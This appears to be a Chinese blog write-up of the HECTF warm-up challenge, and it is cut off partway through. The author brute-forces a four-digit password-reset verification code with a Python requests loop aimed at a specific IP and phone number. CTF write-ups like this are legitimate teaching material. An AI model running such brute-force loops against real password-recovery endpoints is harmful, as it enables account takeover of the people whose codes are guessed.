这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。
签到
点一下忘记密码
然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上
import requests
url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check='
url2='&next=%E4%B8%8B%E4%B8%80%E6%AD%A5'
for i in range(0,10):
for j in range(0,10):
for k in range(0,10):
for l in range(0,10):
pay=str(i)+str(j)+str(k)+str(l)
url=url1+pay+url2
res=requests.get(url)
if len